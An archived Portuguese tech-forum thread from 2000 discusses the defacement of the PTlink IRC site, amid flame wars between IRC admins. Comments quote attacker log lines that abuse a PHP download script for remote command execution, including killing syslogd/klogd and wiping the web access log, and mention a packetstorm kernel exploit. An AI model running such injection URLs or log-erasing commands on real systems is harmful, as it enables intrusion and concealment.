gildot

Topo
Sobre
FAQ
Tópicos
Autores
Preferências
Artigos
Sondagens
Propor artigo


8/3
gildicas
9/30
jobs
10/9
perguntas
10/25
press

 
Forpaxe strikes back (again)
Contribuído por spyder em 12-10-00 0:00
do departamento together-at-last
Teenagers com demasiado tempo livre... Shlak e um Anonimo escrevem "Pois é o nosso amigo continua sem nada para fazer, e faz isto... Um screenshot pode ser encontrado aqui, se a "original" desaparecer " [Estive mesmo para apagar esta submissão... Mas não resisti. Defacements e IRC, juntos, at last ;) e ainda... ele vem atrás do Gildot! Tremam, infiéis :)]

Frigoríficos IBM com RedHat :) | ADSL... para o ano  >

 

gildot Login
Login:

Password:

Referências
  • isto
  • aqui
  • Mais acerca Teenagers com demasiado tempo livre...
  • Também por spyder
  • Esta discussão foi arquivada. Não se pode acrescentar nenhum comentário.
    uhuhuhhuhuhuhu (Pontos:0)
    por Anonimo Cobarde em 12-10-00 0:58 GMT (#1)
    Forpaxe ! Forpaxe ! Forpaxe !
    Bem,agora a sério...afinal é um só,são dois ou três ?
    Ainda não percebi bem a vossa cena,expliquem lá porque andar assim tão á mostra mesmo com gente graúda a querer apanhar-vos não acham que deviam fechar a loja ou querem mesmo serem apanhados? A vossa sorte é o facto de ainda ninguém se lembrar em seguir-vos diáriamente tal como aconteceu com o guru americano.Eu adoro-vos e não gostava que fossem apanhados,ok!
    Re:uhuhuhhuhuhuhu (Pontos:1)
    por spyder em 12-10-00 1:09 GMT (#2)
    (Utilizador Info)
    Hmmm... Eu mantenho a minha teoria de que o f0rpaxe original ficou sem pilhas quando acabaram os NT's com Cold Fusion.
    A partir dai', foram outras pessoas a usar o nome para desviar suspeitas, ou porque acharam piada. Esta, por exemplo, tem erros a menos. o miudo nao sabia escrever ingles :)
    Re:uhuhuhhuhuhuhu (Pontos:0)
    por Anonimo Cobarde em 12-10-00 4:37 GMT (#3)
    Então será uma falsificação barata.É por isso que o nosso nível desceu.É pena !
    Re:uhuhuhhuhuhuhu (Pontos:1)
    por BuBbA em 12-10-00 19:22 GMT (#38)
    (Utilizador Info) http://www.BuBix.net
    Erros a menos...? O que é que é para ti erros suficientes?! aquilo parece o exame do meu sobrinho de ingles...

    (note-se que o meu sobrinho tem 1 ano...)

    Re:uhuhuhhuhuhuhu (Pontos:1)
    por badfile em 12-10-00 8:21 GMT (#8)
    (Utilizador Info)
    Mas chegou a existir ????


    Moral da história (Pontos:2, Interessante)
    por Lamego em 12-10-00 4:38 GMT (#4)
    (Utilizador Info)
    Olá,
    quer me parecer que a gildot tá a precisar de um flamezito para subir os hits por isso nada bom como o "deface of the day". Basta-me lamentar que quando enviei um artigo sobre o software desenvolvido pela PTlink e a sua projecção a nível internacional (nomeadamente estar no top100 de opensource na sourceforge este não tenha sido considerado de valor.
    Quanto ao deface propriamente dito não tem grande ciência, um php3 muito mal programado que deu accesso de user local, confiando na rigorosa política que evitava a existência de utilizadores potencialmente perigosos e face à indisponibilidade para fazer alguns upgrades necessários (é tudo muito bonito, tudo muito trabalhoso, mas na PTlink ninguem come do IRC) a aquisição de privilégio de root foi um processo facil com o download de alguns exploits da packetstorm (como consta nos logs). Agradeço tambem a opurtonidade que essa ou essas pessoas me deu de mostrar que não sabe algumas normas básicas de segurança, como o de não colocar os logs nos caminhos pré-definios, por isso além de nos terem ensinado como fizeram o deface deixam-nos ainda rir com:
    ...?file=/tmp/com.php3&com=/var/tmp/labregamos -c killall -KILL syslogd; killall -KILL klogd; echo>/var/log/httpd.access_log...
    Bem, perdi uma noite de sono para compor (pelo menos por hoje) o que uma pessoa aprendeu em muitas noites, por isso força continuem, mas para a próxima mostrem saber um pouco mais de Linux alem de "wget exploiturl", fica bonito pelo menos para os logs.


    Atenciosamente, Lamego@PTlink.net

    P.S.: Hoje vou ter jantar de curso por isso se fizerem deface de novo só recuperamos na sexta.
    Re:Moral da história (Pontos:1)
    por badfile em 12-10-00 8:26 GMT (#9)
    (Utilizador Info)
    Nao comem do irc ????

    Pressuponho que outros comem ....

    Ja agora.. o que e' que o irc tem haver com o deface da pagina ???

    Mensagens subliminares...

    Vai.. coloca la aqui os servidores todos e um pequeno tutorial de como se ligar ao irc...


    Re:Moral da história (Pontos:1)
    por Lamego em 12-10-00 10:42 GMT (#20)
    (Utilizador Info)
    Tem a ver que se trata de uma página de uma rede de IRC e como tal administrada com uma relação directa com trabalho e disponibilidade para IRC.
    Re:Moral da história (Pontos:0)
    por Anonimo Cobarde em 12-10-00 23:37 GMT (#54)
    heh..
    é fodido pah :D foste ownado e o resto é letra ;D
    oq é triste, é tu usares tudo oq podes para publicidade :)
    nao me admirava nada que tivesse sido um auto-own!
    alias, até era kewl porque:
    a) ja podias dizer q ownaste qualquer coisa :))
    b) podias publicitar mais o "teu" server...
    c) podias mostrar que és idiota

    l8r on stupid biatx :))

    regardz, wC!
    Re:Moral da história (Pontos:0)
    por Anonimo Cobarde em 12-10-00 9:28 GMT (#12)
    Mas que raio tem a haver o open-source e o irc e as guerras ptnet vs ptlink pro caso !?!?
    Que interessa que eles sao lames ou que nao sabem muito de linux... sabem o suficiente para te "lixar" a maquina.
    Foram "hackados"... pronto! É comer e calar... pra proxima corre melhor.

    Mania destes admins de levarem na cabeca e ainda virem dar uma de superiores. "Sejam humildes" :-)

    Re:Moral da história (Pontos:0)
    por Anonimo Cobarde em 12-10-00 9:40 GMT (#13)
    Desculpa, mas foram crackados...
    Re:Moral da história (Pontos:1)
    por Lamego em 12-10-00 10:46 GMT (#22)
    (Utilizador Info)
    Ui, toda a gente sabe partir um copo mas pouca gente o sabe fabricar.. o que interessa é saber algo, grande teoria ...
    Re:Moral da história (Pontos:0)
    por Anonimo Cobarde em 12-10-00 15:30 GMT (#29)
    A questao é que isso nao conta nada para o caso!!!

    Que interessa se ias de carro e bates-te no da frente e ele era massarico ? Bates-te e pronto... pagas e calas.

    O modus-operandi(ou la como se diz) nao esta em questao. A questao é que bem ou mal levas-te na cabeça. Face it... you been defaced.

    Re:Moral da história (Pontos:1)
    por HiTek DeVil em 12-10-00 22:47 GMT (#50)
    (Utilizador Info)
    A diferença é como na culinária... eu sei fazer omoletes, mas os grandes chefs é que ganham as grandes notas (e o prestigio) porque as sabem fazer suberbamente (e que eu saiba, nao recebi nenhum premio pelas minhas omoletes... eles sim, recebem)


    HiTek DeVil
    Re:Moral da história (Pontos:2, Interessante)
    por HiTek DeVil em 12-10-00 22:45 GMT (#49)
    (Utilizador Info)
    erm.... bem, uma pessoa uma vez disse-me "se fizeres o que sabes, e bem, e' porque realmente sabes fazer essa coisa... se a fizeres, mas mal, por muito bonita que essa coisa fique, nao aprendeste nada"... bem, acho que posso aplicar essa frase ao que o lamego disse... ao menos aprendam coding (nao façam como eu q nao programo nada de jeito à 3 anos... só os projectos para algumas cadeiras da faculdade), aprendam linux, como funciona, e codem o vosso proprio exploit (a julgar pelo que o Lamego escreveu)... é muito bonito usar as coisas dos outros, mas só mostra que sabe quem usa as suas coisas (isto por causa de criticarem os coders da ptlink... que se criticou, mas nao se fez melhor que eles)

     
    HiTek DeVil
    Re:Moral da história (Pontos:1)
    por Lamego em 12-10-00 6:58 GMT (#7)
    (Utilizador Info)
    Nota-se sem surpresa o sencionalismo mediático deste artigo. Em vez de se procurar apoiar os poucos grupos e projectos open source portugueses sejam eles em que área for, escolhe-se a publicação de outros artigos cujos os únicos resultados são uns minutos de glória para pessoas com tempo livre a mais, e um assunto polémico para atrarir audiência.
    Re:Moral da história (Pontos:1)
    por darkangel em 12-10-00 17:20 GMT (#32)
    (Utilizador Info)
    Indeed...de facto estas threads são um completo desperdício de banda e espaço em disco.

    Fap no fdp do forpaxe.

    Manda os logs pra PJ.
    Mais uma consideração (Pontos:1)
    por Lamego em 12-10-00 4:55 GMT (#5)
    (Utilizador Info)
    Tópico do #Porto na PTnet
    -ChanServ (suporte@PTnet.org)- Ultimo topico: http://www.ptlink.net A "concorrencia" *aham* hacked :-p ( http://www.geocities.com/f0rp4x3/ e' mirror, segundo o www.gildot.org ) -ChanServ (suporte@PTnet.org)- autor: XeOn
    Para quem nao sabe Xeon é um dos services admins da PTnet, por isso acho importante referir o meu agradecimento à PTnet por parte do seu admin e ao #Porto pelo seu tópico pela valorização que dão ao trabalhos dos outros.

    Lamego@PTlink.net

    P.S: No IRC só temos colegas, não concorrentes.
    Não apresento um screenshot porque quem precisa de inventar edita tão bem uma imagem como edita um texto, eu não preciso.

    Re:Mais uma consideração (Pontos:1)
    por badfile em 12-10-00 8:28 GMT (#10)
    (Utilizador Info)
    Faz-me lembrar logs / conversas entre ircops da ptlink e da ptnet... a aparecerem no topico do #portugal da ptlink...

    Dor de cotovelo ??

    Re:Mais uma consideração (Pontos:1)
    por Lamego em 12-10-00 8:45 GMT (#11)
    (Utilizador Info)
    Tás a falar do tempo em que eras ircop na PTlink e falavas mal dos IRCops da PTnet não ? Tás a considerar defacing que implica prejudicar o trabalho de alguém com citações engraçadas ? E se bem me lembre tais citações nunca foram postas em canais publicos, pelo menos não por mim, já a terem sido postas por ti tenho as minhas dúvidas.

    Lamego@PTlink.net

    P.S.: Se tivesses um bocado de vergonha na cara ou pelo menos valores fixos, não te metias nestas escaramuças onde tu defendes um ponto de vista de acordo com a equipe que te interessa no momento.
    Re:Mais uma consideração (Pontos:1)
    por fmp em 12-10-00 10:22 GMT (#19)
    (Utilizador Info)
    Pois é.. quando toca a nos o assunto ja pia de outra maneira nao é?
    Re:Mais uma consideração (Pontos:1)
    por badfile em 12-10-00 10:43 GMT (#21)
    (Utilizador Info)
    Sabes mto bem que nao era so' ircop...

    E correcao de novo.. tanto falava mal deles como falo agora .. Nada mudou.. Nao foi porque eu estou agora na ptnet que o caso muda de figura.

    critico na mesma.. se eles o merecerem...

    sabes tambem que onde me meto tento levar as coisas para a frente.. Bem tentei na ptlink.. infelizmente ninguem quis... n foi por falta de oportunidade.. e ainda a pouco tempo tive uma conversa ctg acerca disso...

    e como tu sabes eu defendo o que eu penso... E nao por equipas que estou no momento...

    Conheces-me suficientemente bem para o saber...

    Essas citacoes tanto foram postas como foram bem divulgadas. E nas quais eu nem comentei.. remember ?


    Re:Mais uma consideração (Pontos:0)
    por Anonimo Cobarde em 12-10-00 22:13 GMT (#45)
    ehs um cromo !
    Re:Mais uma consideração (Pontos:2)
    por nmarques em 12-10-00 9:50 GMT (#15)
    (Utilizador Info) http://nmarques.xpto.org
    oh jovens, axam realmente que é necessário haver "lavagem de roupa" em publico ?? Normalmente os users ligam-se onde quiserem, a escolha é deles, a PTnet apenas leva vantagem pq tem os ISP´s do lado deles, pq se os ISP´s estivessem na PTlink, duvido que a PTnet fosse tao concorrida como é. Mas isto é apenas a minha opiniao... acho que estes "flames" ou lá o que lhe queiram chamar, sao apenas provocados por rivalidades, seja como for, deveriam era zelar pelos vossos users e tentzr "amealhar" mais alguns em vez de _perderem_ o vosso tempo com estas "flame warz". Se foram hackados ou nao, ou o que lhe queiram chamar, é pá acontece a qualquer um... Desta vez foram voces... Os proximos serão outros!
    Nelson Marques
    Re:Mais uma consideração (Pontos:1)
    por xeon em 12-10-00 10:21 GMT (#17)
    (Utilizador Info) http://pthelp.org
    "(...)Para quem nao sabe Xeon é um dos services admins da PTnet,(...)".

    ERRADO. Nao sabes destinguir o XeOn IRCop/adm/sadm do XeOn User/Op de um canal !? Tsk tsk ... e dizes-te tu SADM de uma rede de IRC... com essa capacidade de descernimento, dou gracas por nao ser teu user ... :-)

    Ja' agora... reconheces estas linhas ?
    "Olás, mas porquê tantos anónimos cobardes, estão com medo de levar um deface do WC ? Bem então aqui fica pro Sr. WC Pato, http://www.ptlink.net bateu o seu recorde de visitas hoje por isso concerteza é um bom alvo para poderem aparecer mais uns artigos a tornarem o seu nick temeroso.(...)"

    Quem tem telhados de vidro ...

    Re:Mais uma consideração (Pontos:1)
    por Lamego em 12-10-00 13:43 GMT (#25)
    (Utilizador Info)
    Cada um faz a sua opção, uns escondem a personalidade por cobardia anónima defendendo a sua imagem com medo, eu prefiro arriscar a imagem e levar deface mas poder continuar a dizer o que penso respeitando os outros sem ter me esconder. Respeito mas não temo.
    Re:Mais uma consideração (Pontos:0)
    por Anonimo Cobarde em 12-10-00 23:33 GMT (#53)
    you've been hax0red stupid lame[go] :D heh
    that was, like, kewl! ;D
    regardz, wC
    Re:Mais uma consideração (Pontos:0)
    por Anonimo Cobarde em 13-10-00 19:43 GMT (#76)
    Outro cromo..

    wC e' leet como' car@$%#!, escreve em ingles e tudo.. tsk tsk.

    Pergunta ao XeOn se nao te quer dar O-Line.. enquadraste mesmo bem la' com o resto dos ircops/adms da PTnot.

    Re:Mais uma consideração (Pontos:1)
    por BuBbA em 12-10-00 19:21 GMT (#37)
    (Utilizador Info) http://www.BuBix.net
    *ouch*

    ehehe

    Re:Mais uma consideração (Pontos:0)
    por Anonimo Cobarde em 12-10-00 22:14 GMT (#46)
    oh xeon... ehs uma merda !
    Re:Mais uma consideração (Pontos:0)
    por Anonimo Cobarde em 13-10-00 19:46 GMT (#77)
    "ERRADO. Nao sabes destinguir o XeOn IRCop/adm/sadm do XeOn User/Op de um canal !?"..

    Claro Lamego, q ingenuo q es, achas q o XeOn ircop/sadm ia fazer uma coisa daquelas?
    Para q? ele gosta mais de mandar piadas estupidas por wallops, ou quando lhe da' na telha, vai mesmo por global.


    Re:Mais uma consideração (Pontos:0)
    por Anonimo Cobarde em 13-10-00 20:50 GMT (#78)
    nepias dewd... ele gosta eh duns br0x3z feitos pela Diva =)
    Re:Mais uma consideração (Pontos:0)
    por Anonimo Cobarde em 14-10-00 13:38 GMT (#85)
    admin, sadikoadmin, user, op, bai tudo dar ah mesma bosta... ke eh o ke tu ehs... ve lah se nao keres outro deface na p*ta da tua pagina...
    Re:Mais uma consideração (Pontos:0)
    por Anonimo Cobarde em 12-10-00 22:16 GMT (#47)
    num faz mal sabe.se lah se daki a dias nao eh ao contrario... amor com amor se paga...
    Gildot is to blame... (Pontos:0)
    por Anonimo Cobarde em 12-10-00 9:47 GMT (#14)

        O problema e' muito simples, o Gildot faz todo o tipo de posts, incluindo aqueles que nao interessam ao capuxinho vermelho (que infelizmente sao uma boa percentagem).

        Quem nao gosta nao leia, eu pessoalmente ja' so' vou ao Gildot pra relaxar e me rir um bocado das
    flames.

        Quem vem ao gildot para ler noticias ou aprender umas coisas, vao antes a:

          http://www.theregister.co.uk
          http://www.slashdot.org
          http://news.bbc.co.uk/hi/english/sci/tech/default.stm


    Re:Gildot is to blame... (Pontos:1, Interessante)
    por MavicX em 12-10-00 10:14 GMT (#16)
    (Utilizador Info)
    O Gildot acho que tá no bom caminho. Sendo portugues tem de ter temas que interessam aos portugueses ( flate rates, segurança em portugal :-), noticias portuguesas ) para noticias sobre pura tecnologia tems outros sites como os que referistes.

    Mais uma cena ainda não vi nenhum artigo que tu proposeste ao gildot, se queres participar primeiro regista-te e propõe artigos que valem a pena.

    Re:Gildot is to blame... (Pontos:0)
    por Anonimo Cobarde em 13-10-00 12:09 GMT (#60)
    ninguem t'obriga a leres o ke tem na gildot... get lost !
    Akaruz Talk v0.9 (pre-beta) (Pontos:2, Engraçado)
    por tfp em 12-10-00 10:21 GMT (#18)
    (Utilizador Info)
    Agora todos podem falar a linguagem de todos os bons "akarus"... com o Akaruz Talk ...

    Simples... basta usar a seguinte script e podem mesmo dar largas à vossa imaginação e ter o vosso próprio dicionário de palavrinhas... vá sejam criativos...

    #!/usr/bin/perl -w
    use strict;
    my $dictionary = {
    'suck'=>qw(sux),
    'the'=>qw(tha),
    'lol'=>qw(lollllll)
    };
    my $talk = <STDIN>;
    $talk =~ s/(\w+)/exists($dictionary->{$1})?$dictionary->{$1}:$1/egi;
    $talk =~ tr/aAeEiIoOcC/44331100kK/;
    print $talk;

    4nd n0w f0r s0m3th1ng k0mpl3tly d1ff3r3nt, 4 m4n w1th 4 t4p3 r3k0rd3r 0n h1s n0s3...

    f34r! w3 4r3 d00m3d!

    Re:Akaruz Talk v0.9 (pre-beta) (Pontos:1)
    por Dehumanizer em 12-10-00 14:48 GMT (#27)
    (Utilizador Info)
    são ridículos, não são? :)


    "Nada é tão grande que não possa ser comido." - Garfield
    Re:Akaruz Talk v0.91 (optimização) (Pontos:1)
    por Anonimo Cobarde em 12-10-00 19:04 GMT (#36)
    Andas com vontade de escrever muito :).

    Changelog:
    • A variável escalar dictionary passou a ser hash em vez de uma referência para uma hash
    • Quando se utiliza operador => pode-se omitir as aspas no termo do lado esquerdo (é automaticamente convertido para string pelo interpretador)
    • qw é over-kill
    • nada como utilizar a variável $_
    Código:
      #!/usr/bin/perl -w
      use strict;

      my %dictionary = (
        suck => 'sux',
        the => 'tha',
        lol => 'lollllll'
      );

      $_ = <STDIN>;

      s/(\w+)/exists($dictionary{$1})?$dictionary{$1}:$1/egi;
      tr/aAeEiIoOcC/44331100kK/;

      print;
    N0B0DY 3xp3kts th4 Sp4n1sh 1nqu1s1t10n!
    Re:Akaruz Talk v0.91 (optimização) (Pontos:0)
    por Anonimo Cobarde em 12-10-00 21:49 GMT (#42)
    Falta a conversão "qu" -> "k"
    Re:Akaruz Talk v0.91 (optimização) (Pontos:1)
    por megas em 13-10-00 9:51 GMT (#59)
    (Utilizador Info)
    Ehehe.. fiquei com vontade de fazer um post semelhante. :) Regards, megas
    attrition.org (Pontos:1, Informativo)
    por Anonimo Cobarde em 12-10-00 11:34 GMT (#23)
    http://www.attrition.org/mirror/attrition/2000/10/11/www.ptlink.net/
    PTlink (Pontos:1, Engraçado)
    por Anonimo Cobarde em 12-10-00 12:06 GMT (#24)

    PTLink!!!PERIGO!!! Administrador por amadores... Use por sua conta e risco!!!

    Calma ai.. Quisto Não foi Bem assim.. (Pontos:0)
    por Anonimo Cobarde em 12-10-00 14:23 GMT (#26)
    Este hack.. crack.. o que lhe quiserem chamar podem agradecer quase por inteiro a nossa amiga Ph0bica que exactamente como aconteceu no celebre projecto security.sh.. introduziu um maravilhoso php scritp maravilhosamente codado que permitia a execução de comandos na maquina em questão... por exemplo.. http://www.ptlink.net/scripters/download/download.php3?file=/tmp/com.php3&com=dir /etc Com pessoas desta craveira a mexer na maquina.. não há admin que aguente... Split
    A titulo informativo... (Pontos:2, Informativo)
    por jig em 12-10-00 14:54 GMT (#28)
    (Utilizador Info)
    Se nao me engano julgo que isto pode ser resolvido no php.ini com:
    safe_mode = on
    secure_mode=on
    Mas de que nos vale isso agora? :)))))))))
    Re:A titulo informativo... (Pontos:1)
    por BuBbA em 12-10-00 18:55 GMT (#34)
    (Utilizador Info) http://www.BuBix.net
    Paragens jig, parece-me que até ao momento és a unica pessoa que aprendeu alguma coisa com isto!

    Os meus parabens;)

    Re:A titulo informativo... (Pontos:0)
    por Anonimo Cobarde em 12-10-00 21:55 GMT (#43)
    Eu ja conhecia isto ha algum tempo...
    O problema é que a pagina foi mudada para um novo servidor e esquecemo-nos de colocar la isto...Se é que resolve mesmo o problema!

    ircd (Pontos:0)
    por Anonimo Cobarde em 12-10-00 16:39 GMT (#30)
    Será que se limitaram a um defaced ou deram-se ao trabalho de por um backdoor no ircd da PTlink ;)
    Spyder concordo contigo, this isn´t f0rpaxe work ;)
    Re:ircd (Pontos:0)
    por Anonimo Cobarde em 13-10-00 21:19 GMT (#79)
    nao leste ?... o gajo nao re-inventou a roda e utilizou um exploit jah existente... ou seja... seria ele(s) capaz disso ?... guess not =)
    cade a pagina? (Pontos:0)
    por Anonimo Cobarde em 12-10-00 17:15 GMT (#31)
    n40 b3j0 l4 n4d4....n3m n0 g30c1t1e5 n3m n0 www.ptlink.net

    FOI HACKADA! (Pontos:1, Engraçado)
    por Anonimo Cobarde em 12-10-00 18:37 GMT (#33)
    a pagina dos forpaxe foi hackada
    ahahahahahahahahah!!!!!!! http://www.geocities.com/f0rp4x3/
    Re:FOI HACKADA! (Pontos:1)
    por fmp em 12-10-00 19:27 GMT (#39)
    (Utilizador Info)
    phear... afinal quem eh l33t nao sao os forpaxos.. eh a ADM da ptlink LOL
    Re:FOI HACKADA! (Pontos:0)
    por Anonimo Cobarde em 12-10-00 19:44 GMT (#40)
    errr Deva-se dizer que ninguem dentro da adm da ptlink fez aquilo. Falamos uns com os outros e todos desconhecem o autor daquele "so called" deface. A uns minutos atrás esse url dava erro 404 logo a minha opiniao é que depois dos meninos f0rpaxe droparem a account alguem ou algum bicho terá aberto uma nova account e colocado la aquela obra de arte. ps: "hackers, piratas informaticos" ou whatever anda a mexer em muitas cabeças da maneira errada. *g*
    Destruir Vs Construir (Pontos:1)
    por eddie em 12-10-00 18:56 GMT (#35)
    (Utilizador Info)
    Bom. Já à algum tempo que deixei de particirpar neste tipo de threads. Mas desta vez gostava de relembrar algo.

    Basicamente para todos aqueles que se acham o máximo e que acham que mereciam um lugar de destaque no Jet7 e se possivel um prémio nobel porque fizeram um defacemente ou pq destruiram qualquer outra coisa gostaria de dizer que é absolutamente trivial destruir. O realmente dificil é construir.
    Quantos dos putos que fazem os defacements hoje em dia já administraram uma rede ou pelo menos uma maquina de acesso publico?
    Aposto que poucos e os que o fazem podem indicar-me o ip que eu aproveito pra demonstrar que realmente destruir é simplesmente trivial.
    Gostava só de acrescentar que nao sou nem a favor nem contra a ptlink nem estou a defender ou a deixar de defender o Lamego.

    Mais uma vez... (Pontos:1)
    por Branc0 em 12-10-00 20:43 GMT (#41)
    (Utilizador Info) http://www.branc0.f2s.com
    Novamente só uma duvida me surge... o que é que a Gildot.org tem a ver com defacements?!?

    Já há uns tempos tivemos uma noticia dentro do genero vinda dos l33t h4x0rs habituais made in .PT e não achei que isso fosse uma notícia... não sei como é que os editores da Gildot.org o acham...

    É o principio de uma attrition.org portuguesa?
    "The wildest woman can rule the brightest man..."
    F.A.Q. (Pontos:0)
    por Anonimo Cobarde em 12-10-00 22:13 GMT (#44)
    P- Porque é que a gilgot posta "estes" artigos?
    R- Porque a gildot tem "noticias sobre linux...E NÃO SÓ" e além disso, como qualquer pessoa sabe, assim como na época medieval o que estava na moda eram os piratas dos mares, agora são os da rede. Melhores ou piores, não interessa. É também bom referir que a gildot não precisa de postar estes artigos para ter "visitantes", pelo menos na minha opinião, apesar de que, pelo que se nota, há um créscimo significativo de posts/re-posts quando se tocam nestes assuntos.

    P- WTF is PTlink?
    R- A 2ª mais utilizada rede de IRC em .pt(há mais alguma pública?). Apesar de estarem logados por lá mais IRCops do que users, normalmente, mas enfim. Ah, é também bom referir que há "lá" mto boa gente mas o "ADMIN-MOR" aka Lamego não consegue manter a boca calada e em 10 vezes que abre a boca, sai asneira. (sem falar das vezes que fala sobre o que não sabe)

    P- Afinal, o(s) Forpaxe percebe(m) alguma coisa "disto" ou os admins da PTlink sugam?
    R- Se os(o?) Forpaxe sabem alguma coisa de geito, não o demonstraram nunca (ao público) nem o fizeram aqui neste "deface". Agora, também é preciso tomar em atenção que o ph0bic é "boi". Porquê? Porque fez asneira no security.sh e nem se preocupou de "fixar" o erro na ptlink.

    P- Será que este "f.a.q." é um flame a muita gente?
    R- Considerem-no o que quiserem, só achei que era altura de por os pontos nos i's. Deve-me ter faltado mencionar qualquer coisa, mas enfim... quando me lembrar posto a continuação...por isso na percam o próximo episódio!



    forpax0 & Ptlinke S.A. (Pontos:1)
    por Anonimo Cobarde em 12-10-00 22:38 GMT (#48)
    Pronto Branc0, eu vou-te esclarecer de uma vez por todas... (para o Branc0 e para todos os que fazem a mesma pergunta over and over...)
    Sabes o gildot, ok,
    Sabes Preferências,
    Sabes selecionar como não queres ver as threads "Teenagers com demasiado tempo livre..." aka Gildot Hackers/Cracker Threads.
    Ou então faz kill -9 ao Spyder, tb podes fazer isso :)
    Se o forpax0 é PT se a PTlink é PT então lógico que pode sair no Gildot.
    Á que saber seleccionar as news a ver, só lê isto quem quer.
    Mas convenhamos ó Branc0 umas threads destas são boas para a boa disposição do pessoal ;)))

    Agora a minha opinião acerca do hack, a culpa é do menino Ph0bias, pois com aquela page toda l33t feita em PHP3 dos scripters, que até tava girita, o problema é que têm que ter mais atenção às falhas daquilo, http://www.ptlink.net/scripters/download/download.php3?file=/tmp/com.php3&com=dir /etc rrrrrr isto é lógico né, phodias era limitar o script a uma directoria, a tua directoria dos downloads, basico, outra solução é o safe mode - secure mode, embora nem sempre se possa correr o PHP assim devido às premissões e cenas do género, mas num servidor como a PTlinke com um elevado numero de hits e com muitos hackaros á vigia (wc == forpax0?) lógico que deviam estar ambos os modes ON.
    Quanto ao forpax0, hummm, não sei, é um, são dois, é uma matilha, é o wc, é o nabo?
    Pronto, Lamego já sabes o que tens a fazer: logs > PJ
    Ha´ e manda o ph0bias codar em HTML puro... :))

    *H4Ck4R4g0* @ *2k*
    Re:forpax0 & Ptlinke S.A. (Pontos:0)
    por Anonimo Cobarde em 12-10-00 23:31 GMT (#52)
    Ya, agora o wC é o culpado de tudo *g*
    pqp pra vcs!
    já agora, aproveito pra pastar uns momentos hilariantes :))


    - And Now, the true definition of l33t hax0ring -

    [ FractalG ] isis-ip.esoterica.pt
    [ FractalG ] este ip
    [ FractalG ] hum hum
    [ bibo ] tenho ppl a mandar mails
    [ bibo ] com logs dos forpaxe
    [ pheisar ] este ip encontrava-se no tal servidor hackado.
    [ bibo ] do isp
    [ FractalG ] sim
    [ FractalG ] o q eh estranho
    [ pheisar ] q tipo de logs
    [ FractalG ] pq parece ser box do ips
    [ FractalG ] onde ta a puta do munky ?
    [ FractalG ] ehehe
    [ bibo ] os gajos vieram me pedir infos do microship
    [ pheisar ] e o q q tens a ver com isso?
    [ FractalG ] traceroute to isis-ip.esoterica.pt (209.198.242.34), 30 hops max, 40 byte packets
    [ FractalG ] 1 expernet-gw.expernet.pt (212.54.141.1) 2.201 ms 2.191 ms 2.557 ms
    [ FractalG ] 2 212.54.128.193 (212.54.128.193) 10.749 ms 10.689 ms 10.781 ms
    [ FractalG ] 3 212.54.129.1 (212.54.129.1) 15.305 ms 11.582 ms 11.232 ms
    [ FractalG ] 4 212.54.128.9 (212.54.128.9) 22.682 ms 22.969 ms 22.66 ms
    [ FractalG ] 5 212.54.128.6 (212.54.128.6) 36.851 ms 37.248 ms 36.82 ms
    [ FractalG ] 6 PIX.esoterica.pt (193.136.250.50) 39.704 ms 38.569 ms 42.645 ms
    [ FractalG ] 7 tharbad.esoterica.pt (195.22.0.1) 36.88 ms 36.779 ms 36.855 ms
    [ FractalG ] 8 mithril-servers.esoterica.pt (195.22.6.129) 48.28 ms 50.283 ms 42.524 ms
    [ FractalG ] 9 isis-ip.esoterica.pt (209.198.242.34) 63.224 ms 70.379 ms *
    [ FractalG ] f0rpaxe a hackarem duma maquina interna da esoterica ???
    [ FractalG ] hummmmmm
    [ bibo ] ...
    [ FractalG ] ha aqui qq coisa mal
    [ bibo ] oh fractalg
    [ bibo ] ehs lamer?
    [ bibo ] sinceamente
    [ bibo ] eh assim
    [ bibo ] isis-ip.esoterica.pt = proxy
    [ bibo ] esoterica www = proxy
    [ FractalG ] e hakcas coldfusion por proxy ?
    [ bibo ] claro
    [ bibo ] hackas pela web
    [ bibo ] duh


    And that's a RAP ;)
    regardz, wC!
    Re:forpax0 & Ptlinke S.A. (Pontos:0)
    por Anonimo Cobarde em 13-10-00 1:04 GMT (#55)
    A canalha do #hackers é mesmo hilariante... principalmente aquele "cavalheiro" do FractalG.
    Tem serios problemas... desde que lhe morreu o crocodilo. ;-)
    Re:forpax0 & Ptlinke S.A. (Pontos:1)
    por Branc0 em 13-10-00 22:08 GMT (#80)
    (Utilizador Info) http://www.branc0.f2s.com
    So a titulo informativo as eleicoes da Madeira e dos Acores tambem sao em PT e nao sao postadas no Gildot...

    Deface eh noticia?
    Foi so isso k questionei... ASS.: Branc0
    "The wildest woman can rule the brightest man..."
    Re:forpax0 & Ptlinke S.A. // bem.. vai na volta.. (Pontos:2)
    por buffer em 13-10-00 22:26 GMT (#81)
    (Utilizador Info) http://www.coders-pt.org
    Pa, se o Alberto Joao disser que vai mandar instalar linux nas maquinas todas la do sitio é capaz de aparecer ;PP
    -- what was my problem with man You ask? No.. I ask you what was man's problem with me..
    Ph0bic tha k4x0r (Pontos:0)
    por Anonimo Cobarde em 12-10-00 23:24 GMT (#51)
    Aqui está a prova provada de que os kiddies dos defaces fraqueijam (isto escreve-se assim?) na matéria de segurança, porque, sim, segurança requer mais conhecimento e paciencia, coisa que um kiddie não tem...

    Só dou um concelho: não tentem começar a casa pelo telhado. Não queiram ser h4x0rs (hackers, para os que gostam de falar como gente) antes do tempo e à força pois (já para não falar da barraca que dão) nem todos têm vocação para tal. Outra coisa que devem ter sempre em mente é que amanhã vamos aprender algo que ainda não sabemos hoje e que há alguem que sabe mais que vós.

    Cut here -----------

    A quem cuida disto (gildot) era bom porem a opção "Texto Simples" como default na submissão de comentários. Eu, por exemplo, não gosto de passar o tempo a formatar texto e parágrafos em HTML.

    mrk: A lamer on it's best
    Re:Ph0bic tha k4x0r (Pontos:1)
    por lucipher em 14-10-00 9:58 GMT (#84)
    (Utilizador Info)
    meio off topic, mas devias fazer essa questão do texto simples aos produtores do gildot engine, aka slashcode checka www.slashcode.com
    "do not try to bend the spoon !" (matrix)
    Como foi feito o deface (Pontos:1, Interessante)
    por Anonimo Cobarde em 13-10-00 1:10 GMT (#56)
    Para os mais curiosos... o Labrego acertou em quase tudo:
    Só se esqueceu de mencionar uma coisa (ou os logs desapareceram misteriosamente, ou por aqueles lados URL-encode é chinês): o RedHat 6.2 não é vulnerável ao exploit tirado da packetstorm. (sim, aquilo é um RedHat 6.2). O smlnx.sh (que usa o bug presente nos kernels de Linux entre 2.2.0 e 2.2.15, com uma ajuda do sendmail.) teve que levar com uma série de substituições em cima (não sabes ler perl, Labrego? ou só não sabes ler expressões regulares? ou ficaste-te mesmo por não saber ler URL-encoded strings?)
